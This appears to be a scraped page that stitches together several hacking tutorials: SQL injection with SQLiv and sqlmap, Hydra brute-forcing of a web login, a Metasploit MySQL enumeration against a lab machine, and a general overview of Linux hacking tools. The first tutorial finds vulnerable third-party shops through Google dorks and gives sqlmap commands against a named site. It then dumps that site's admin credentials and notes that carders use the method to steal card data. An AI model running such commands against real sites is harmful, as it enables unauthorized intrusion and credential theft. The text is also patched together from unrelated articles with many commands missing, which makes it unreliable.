hack website database using kali linux

SQL Injection with Kali Linux.

The use of databases for various data storage management greatly increases in web app development as time goes on. Database facilitates
interaction between users and servers. The database (or in terms of Database Management System abbreviated to DMBS) provides various
benefits including data input and storage, retrieval of large information and the ease of compiling and grouping information.
But, beside the ease and features that the database offers, as well as the many uses of databases in the world of Information and technology,
especially in the development of a website. Unceasingly Pentesters and hackers are trying to find a gap in the security of the database. This is
confirmed by the report issued by Positive Technologies researchers, information security research centers in Europe, in the second quarter of
2017, the top 10 web application attacks were dominated by cross-site-scripting of 39.1% and SQL injection of 24.9%. Positive Technologies
said the report in the second quarter is not much different from the first quarter.
Figure 1. Top 10 web application attacks (source ptsecurity.com)
This is both interesting and worrying, because in a database there are a lot of information like credential accounts (admin and user), financial
information details (such as credit cards, bank accounts, etc.) and so on. Also, to do SQL injection attacks does not always require expert
injecting capabilities, in the sense, kids can do it. Because there are many free applications that are able to perform SQL injection automatically,
such as SQLMap. SQLMap is an open source application for penetration testing activities that aims to conduct SQL injection attacks in a
database security hole automatically. Here I will show you how to do SQL injection using SQLMap in Linux Kali. No special capabilities are
required, but will be worth more if you master a scripting language or SQL database technology.
This tutorial is recommended for those who are new to SQL injection in Kali Linux, just for fun, or whom want to see how SQL injection works. It
is not recommended to those are highly skilled Penetration Testers already.
SQL INJECTION USING SQLMAP IN KALI LINUX.
Before we are doing the injection attack, of course we must ensure that the server or target has a database security hole. To find database security
holes, there are several methods we can use. Among them, Google dorking, is used mostly by hacker and penetration testers. Luckily there is a
tool that is able to do that automatically. But we have to install its tool first. The tool is called SQLiv (SQL injection Vulnerability Scanner).
STEP 1 : INSTALL SQLiv on KALI LINUX.
Type commands below into your terminal to install SQLiv:
# git clone https://github.com/Hadesy2k/sqliv.git.
# cd sqliv && sudo python2 setup.py -i.
Once SQLiv is installed in your Kali Linux, it is stored in the path /usr/bin/sqliv . Which, you can call directly from the terminal, by typing ‘sqliv’.
Now lets take a look at SQLIv features.
STEP 2 : FINDING SQL INJECTION VULNERABILITIES.
We will use Google Dorking to scan and find the SQL injection hole in targets. Lets take a simple dork, and let SQLiv scan trough every single
target and look for an ecommerce vulnerability at the following URL pattern ‘item.php?id=’. To find other patterns just google for “google dork
list”.
# sqliv -d inurl:item.php? id = -e google -p 100.
By default, SQLiv will crawl first page on search engine, which on google 10 sites per page. Thus, here we define argument -p 100 to crawl 10
pages (100 sites). Based on the dork given above we got a result of vulnerable URLS that looks like this:
We found eight of hundred URLs scanned and considered as vulnerable against SQL injection attack. Save the URLS into text editor for further
steps.
STEP 3 : SQL INJECTION USING SQLMAP.
Once we got at least one SQL injection vulnerable target, next we execute the attack using SQLMap. I take one of them to be a sample here.
Firstly, we need to reveal the database name, inside the database has tables and columns, which contain the data.
A. ENUMERATE DATABASE NAME:
# sqlmap -u “TARGET URL” --dbs.
-u / --url : Target URL --dbs : Enumerate Database / s name.
So, the command compiled would look like this:
# sqlmap -u “http: // www.acfurniture.com / item.php? id = 25 ” --dbs.
From the command above, the result should be look like this.
We got the database name “ acfurniture ”.
B. ENUMERATE TABLES NAME.
# sqlmap -u “TARGET URL” -D database-name --tables.
So, the command compiled be like this:
# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture --tables.
The result should be look like this:
So far, we can conclude that the arrangement of data is, the site acfurniture.com has two databases, acfurniture and information_schema . The
database named acfurniture contains four tables: category, product, product_hacked, and settings . There is no compromised table name, but, let’s
investigate more. Let see what is inside settings table. Inside the table is actually there are columns, and the data.
C. ENUMERATE COLUMNS.
# sqlmap -u “TARGET URL” -D database-name -T table-name --columns.
So, the command compiled be like this:
# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --columns.
The output should be look like this:
The settings table consist of 6 columns , and this is actually a credential account. Lets dump those data.
D. DUMP DATA.
# sqlmap -u “TARGET URL” -D database-name -T table-name -C columns --dump.
So, the command compiled be like this:
# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings -C username,password --dump.
Or you can also dump all data inside the table, using command:
# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --dump.
The output should be look like this:
Email : [email protected] Username : Handsome Password : 9HPKO2NKrHbGmywzIzxUi.
Alright, we are done dumping data in database using SQL injection. Our next tasks are, to find the door or admin panel, admin login page on the
target sites. Before do that, make sure whether that password (9HPKO2NKrHbGmywzIzxUi) is encrypted or not, if so, then we need to decrypt
it first. That is another topic, cracking and decrypting.
Even here we are not actually hacking into the target site, at least we have learned a lot about SQL injection using SQLMap in Kali Linux easily
and we dump the credentials account. This technique is used mostly by carder (hacker who is looking for Credit Card account on E-commerce
sites) which targeting Financial, banking, shop, or e-commerce sites which store their user credit card information.
Crack Web Based Login Page With Hydra in Kali Linux.
A password is technically defined as secret string of characters used to authenticate or gain access to resources. It must be kept in secret and
hiden from others who are not allowed to access those resources. Passwords have been used with computers since the earliest days of computing.
One of the first time sharing systems, was introduced in 1961. It had a login command that requested a user password. After typing
“PASSWORD”, the system turns off the printing mechanism, if possible, so that the user may type in his password with privacy.
The strength of a password is a function of length, complexity, and unpredictability. It measures the effectiveness in resisting of guessing or breaking
it. Weak passwords, on the other hand shorten the time necessary to guess and gain access to personal/corporate e-mails, sensitive data like
financial info, business info, credit cards, etc.
There are many ways a password can be weak corresponding to the strengths power of various attack schemes. The most popular of this kind of
credential attack is, brute force. it is a trial and error method like guessing, attempt to decode encrypted data such password or data encryption
used by application program or “hacking tool”.
Hydra is the fastest network logon cracker which supports numerous attack protocols. It is very fast and flexible, and new modules are easy to
add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system
remotely. Hydra was written by van Hauser and its additionally supported by David Maciejak. In the latest update hydra development is moved to
public github repository at : https://github.com/vanhauser-thc/thc-hydra.
Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1, OpenBSD, OSX,QNX/Blackberry, and is made available
under GPLv3 with a special OpenSSL license expansion.
THC Hydra supports these protocols: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST,
HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-
Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5,
SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
COMPARING HYDRA WITH OTHERS CRACKING TOOLS.
There are also a lot login cracker tools beside hydra, however none support a huge list of protocols and parallelized login cracker support like
hydra does. Tables below show the result of features, services and speed comparison against medusa and ncrack.
Features.
Feature Hydra Medusa Ncrack License AGPLv3 GPLv2 GPLv2 + Nmap terms IPv6 Support Yes No No Graphic User Interface Yes Yes No
Internationalized support (RFC 4013) Yes No No HTTP proxy support Yes Yes No SOCKS proxy support Yes No No Supported protocols
51 22 7.
Services.
Service Details Hydra Medusa Ncrack ADAM-6500 Yes No No AFP Yes Yes No Asterisk Yes No No Cisco Password Yes No No Cisco
Enable Yes No No CVS Yes Yes No Firebird Yes No No FTP Yes Yes Yes SSL support AUTH TLS & FTP over SSL AUTH TLS & FTP
over SSL No HTTP Method(s) GET, HEAD, POST GET GET Basic Auth Yes Yes Yes HTTP Form Method(s) GET, POST GET, POST No
SSL support HTTPS HTTPS No HTTP Proxy Basic Auth Yes No No DIGEST-MD5 Auth Yes No No NTLM Auth Yes No No SSL support
HTTPS No No HTTP PROXY URL Enumeration Yes No No ICQ v5 Yes 1 No No IMAP LOGIN support Yes Yes No AUTH LOGIN
support Yes No No AUTH PLAIN support Yes Yes No AUTH CRAM-MD5 support Yes No No AUTH CRAM-SHA1 support Yes No No
AUTH CRAM-SHA256 support Yes No No AUTH DIGEST-MD5 support Yes No No AUTH NTLM support Yes Yes No AUTH
SCRAM-SHA1 support Yes No No SSL support IMAPS & STARTTLS IMAPS & STARTTLS No IRC General server password Yes No
No OPER mode password Yes No No LDAP v2, Simple support Yes No No v3, Simple support Yes No No v3, AUTH CRAM-MD5
support Yes No No AUTH DIGEST-MD5 support Yes AUTH NTLM support Yes Yes AUTH SCRAM-SHA1 support Yes SSL support
IMAPS & STARTTLS IMAPS & STARTTLS IRC General server password Yes OPER mode password Yes LDAP v2, Simple support Yes
v3, Simple support Yes v3, AUTH CRAM-MD5 support Yes v3, AUTH DIGEST-MD5 support Yes MS-SQL Yes Yes MySQL v3.x Yes
Yes v4.x Yes Yes v5.x Yes Yes NCP Yes Yes NNTP USER support Yes Yes AUTH LOGIN support Yes AUTH PLAIN support Yes AUTH
CRAM-MD5 support Yes AUTH DIGEST-MD5 support Yes AUTH NTLM support Yes SSL support STARTTLS & NNTP over SSL
Oracle Database Yes Yes TNS Listener Yes.
Crack Web Based Login Page With.
Speed Comparison.
Speed (in s) Hydra Medusa Ncrack 1 Task / FTP module 11.93 12.97 18.01 4 Tasks / FTP module 4.20 5.24 9.01 16 Tasks / FTP module
2.44 2.71 12.01 1 Task / SSH v2 module 32.56 33.84 45.02 4 Tasks / SSH v2 module 10.95 Broken Missed 16 Tasks / SSH v2 module 5.14
Broken Missed.
That was a brief simple introduction to hydra. Now lets move onto installation.
INSTALLING HYDRA.
Hydra is pre-installed on kali linux, however if you have a different operating system you could compile and install it on your system. Currently,
hydra’s support on different platforms:
All UNIX platforms (Linux, *bsd, Solaris, etc.) MacOS (basically a BSD clone) Windows with Cygwin (both IPv4 and IPv6) Mobile systems
based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)
To download, configure, compile and install hydra, just type into terminal:
If you have Ubuntu/Debian you will need some dependency libraries:
If you could not find those libraries in your repository, then you need to download and install them manually.
HOW TO USE HYDRA.
Congratulation, now you have succeeded to install hydra on your system. Actually, Hydra comes with two flavors, GUI-gtk and my favorite, CLI
version. and in addition hydra has also CLI guided version, its called “hydra-wizard”. You will be guided step by step instead of typing all the
commands or arguments manually into the terminal. To run hydra, from your terminal type :
For CLI :
For CLI-wizard :
For GUI :
After you type ‘hydra’ it will display help commands like this:
Bruteforce web based login with hydra.
Hydra supports some bruteforcing service as i mentioned earlier, one of them is used to bruteforce web based logins such as, social media login
form, user banking login form, your router web based login, etc. That “http[s]- -form” which will handle this request. In this tutorial i am going to
show you how to bruteforce vulnerable web logins. Before we fire up hydra we should know some needed arguments such below:
Target : http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Login username : admin (if you don’t sure, bruteforce this)
Password list : “The location of dictionary file list containing possible passwords.” Form parameters : “for general, use tamper data or proxy to
obtain form of request parameters. But here im using iceweasel, firefox based, network developer toolbar.” Service module : http-post-form.
Let’s break down the commands:
l <username> : is a word containing username account, use -L <FILE> to refer list of possible user name in a file. P <FILE> : is a file list of
possible password, use -p <password> to literally use one word password instead of guess it. testapp.vunlwebapp.com : is a hostname or target
http-post-form : is the service module we use “/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout”
= the 3 parameters needed, the syntax is : : :S= v = Verbose mode V = show login:pass for each attempt f = Terminate program if pair
login:password is found.
Now lets let hydra try to break the password for us, it needs time since it is a dictionary attack. Once you succeded finding a pair of
login:password hydra will immediately terminate the job and show the valid credential.
There is so much that hydra could do, since in this tutorial we just learned how to bruteforce web based logon using hydra, we only learn one
protocol, that is http-post-form protocol. We can also use hydra against another protocol such ssh, ftp, telnet, VNC, proxy, etc.
How To Hack A Website - Simple Demo | Kali Linux / BackTrack | Pranshu.
SQL injection has long been an web application security concern and yet there exists a plethora of websites stil vulnerable to SQL injections
today. I refrain from any testing on such websites due to lack of explicit permission by owners. However, here’s a demonstration–from one of my
penetration testing projects–of how these websites may be hacked if the SQL vulnerabilities are left unpatched.
Tip: Read up a little on SQL injection. For example, start with figuring out what this is trying to do:
SELECT \* FROM users WHERE name \= '' OR '1'\='1';
The tool sqlmap comes preloaded with both Kali and Backtrack.
If the dynamic parameter in the php script is vulnerable then sqlmap will try to inject code into it.
I’ve blacked out the website’s information for obvious reasons.
First, get the tool to list the available databases:
The information\_schema DB is where MySQL stores the schema, so I’m not interested in that one. The other one is my target.
I try to grab the ‘tables’ available in this other database:
There are a bunch of tables that get listed, among those the table ‘members’ looks interesting, grab the columns for that table:
And I see a column with passwords, I’ll get the hashes here (I’ve seen some web admins who are so careless that they store the passwords in
plaintext which would require no password cracking):
Finally, I get my hands on the password hashes and the reverse engineering begins from there (use jtr):
Unless you actually know what sqlmap did for you in the background, it is not that interesting and makes you a perfect script kiddie.
Once you crack the password hashes, you can login to the website’s control panel as ‘admin’ and then change html files (index.html for
homepage). That would be website defacing.
Disclaimer: As stated in the beginning, this excerpt is from an authorized penetration test. If you notice an SQL weakness in a website, please
refrain from engaging in illicit activities and inform the web administrator.
Linux Hacking.
Learn about Linux Hacking Tools, How to Stop Hackers.
Background on Linux.
Linux is an open source operating system for computers. Linux is a Unix-like operating system, meaning that it supports multitasking and multi-user
operation. Linux is widely used for supercomputers, mainframe computers, and servers. Linux can also run on personal computers, mobile devices,
tablet computers, routers, and other embedded systems. One of the most prominent examples of this is the Android mobile operating system,
which is based on the Linux Kernel. Linux is capable of running many of the same applications and software as Windows and Mac OS X. Linux
operating systems, software, and applications are commonly referred to as Linux distributions (distros for short).
Secure Coding Handbook.
Linux Hacking.
Linux is an extremely popular operating system for hackers. There are two main reasons behind this. First off, Linux’s source code is freely
available because it is an open source operating system. This means that Linux is very easy to modify or customize. Second, there are countless
Linux security distros available that can double as Linux hacking software.
Generally speaking, there are two types of Linux hacking: hacking done by hobbyists and hacking done by malicious actors. Hobbyists are often
hackers looking for new solutions to software problems or tinkerers looking for new uses for their software/hardware. Malicious actors use Linux
hacking tools to exploit vulnerabilities in Linux applications, software, and networks. This type of Linux hacking is done in order to gain
unauthorized access to systems and steal data.
Linux Hacking Tools.
Malicious actors typically use tools such as password crackers, network and vulnerability scanners, and intrusion detection software. These Linux
hacking tools all serve different purposes and are used for a wide range of attacks.
Password crackers are software developed for decoding passwords in a variety of formats, such as encrypted or hashed passwords. Many
cracking distros offer additional functionality such as network detectors and wireless packet sniffing. Malicious actors use these Linux hacking tools
because they offer a simple way to gain access to an organization’s network, databases, directories, and more. Password cracking distros are
commonly used in Linux wifi hacking (Linux hacking that targets wireless networks).
Linux network scanners are used to detect other devices on a network. In doing so, attackers are able to develop a virtual map of the network. In
addition to discovering other devices, many network scanners are capable of gathering details about devices such as which operating systems,
software, and firewalls are being used. Network scanners are used to discover network security holes in Linux wifi hacking. They also can be used
to gather information useful for Linux distro hacking (Linux hacking that targets software, applications, operating systems, etc).
Linux vulnerability scanning software is used to detect vulnerabilities in systems and applications. Malicious parties often use vulnerability scanners
as Linux hacking software in order to detect exploitable vulnerabilities, gather simple passwords, discover configuration issues, and perform denial
of service attacks. Vulnerability scanners are frequently used for Linux distro hacking because of these capabilities.
Linux Hacking Prevention and Mitigation.
Fortunately, there are measures that organizations and individuals can take to lessen the risk and threat of Linux hacking. Many of these security
procedures use the same tools that malicious parties abuse in Linux hacking. Organizations can use the tools discussed above (password crackers,
network scanners, vulnerability scanners, wireless sniffers, intrusion detection systems, etc.) to test their software and networks from a hacker’s
perspective. Regular testing and monitoring using Linux hacking software gives organizations the opportunity to discover software and network
vulnerabilities before attackers.
Hacking MYSQL Database using Metasploit in Kali Linux.
Cyber reconnaissance is the most significant phase to stimulate an attack. Without any prior knowledge of a victim and the weaknesses that can
help to exploit the target, the attack could not be successfully generated.
Talking about target, Cyber world is not entirely an internet but a lot more than that. It is an entity of independent networks containing
telecommunication networks, databases, smart devices and web applications. There are different tricks and techniques to exploit each of them
depending upon the information we get after reconnaissance.
Exploiting database is a key target for cyber criminals due to a valuable information storage and a number of loopholes including deployment
failures, broken databases, data leak, stolen database backup, lack of segregation, SQL injections and database inconsistencies.
Any information related to database is advantageous to an attacker when it comes to generate an attack. Whether the information is about the
version of database or the structure of database can render more juicy information to plan a strategy. If the version of database is outdated, it can
be easily attacked through finding a suitable exploit. Moreover, weak credentials of low secure databases can help to use credential reusability or
brute-forcing credentials to compromise highly secured database. Lastly getting knowledge of the schema of database is vital to perform SQL
injection attack.
So today we are going to enumerate some of this information related to MYSQL database. We will use Metasploit framework as it includes many
effective auxiliary modules to easily exploit the target. Use Metasploit framework via Kali Linux and target Metasploitable2 to observe the output.
Scanning.
The first ever step of reconnaissance is scanning the target. It will determine if the MYSQL database is running on victim’s machine. As we know it
runs on port 3306, use Nmap with the target’s IP to scan the target:
It shows that MYSQL is running on the target and the port is open.
Its time to enumerate this database and get information as much as you can collect to plan a better strategy.
Execute Metasploit framework by typing msfconsole on the Kali prompt:
Search all modules of MYSQL that can be helpful to generate an exploit. Type search mysql:
It listed a number of modules. As of now we are only concerned with the auxiliary scanners.
Cracking the Credentials.
Let’s try mysql_login module first to crack some valid credentials of the MYSQL. Type use command to load the module:
Type options to see the current settings of this module:
Now create a file including a list of common usernames. I just prepared a short list for the demonstration purpose but in real, publicly available
longer lists have been used to crack the credentials. Name it as you want:
Add some common usernames and save it:
Again, create a file containing common passwords. Usually a longer list has been used but as it will take more time to complete the module, we will
keep it short. Add the passwords and save the file:
Set the created files i.e. ehacking_user.txt and passwords.txt to read the usernames and passwords from these files:
As MYSQL gives permission to login with a blank password therefore set this option true to check for blank passwords:
Set the target IP address. Use setg command to set this option globally since we are going to execute all modules on the same target:
All settings are done now run the module by typing exploit:
See the complete story published at ehacking blog.
Размещено участником.
Irfan Shakeel.
Cyber Security Consultant / Trainer, Founder & CEO - ehacking.
The steps to enumerate MYSQL database using Metasploit module. #hacking #cybersecurity #technology #metasploit.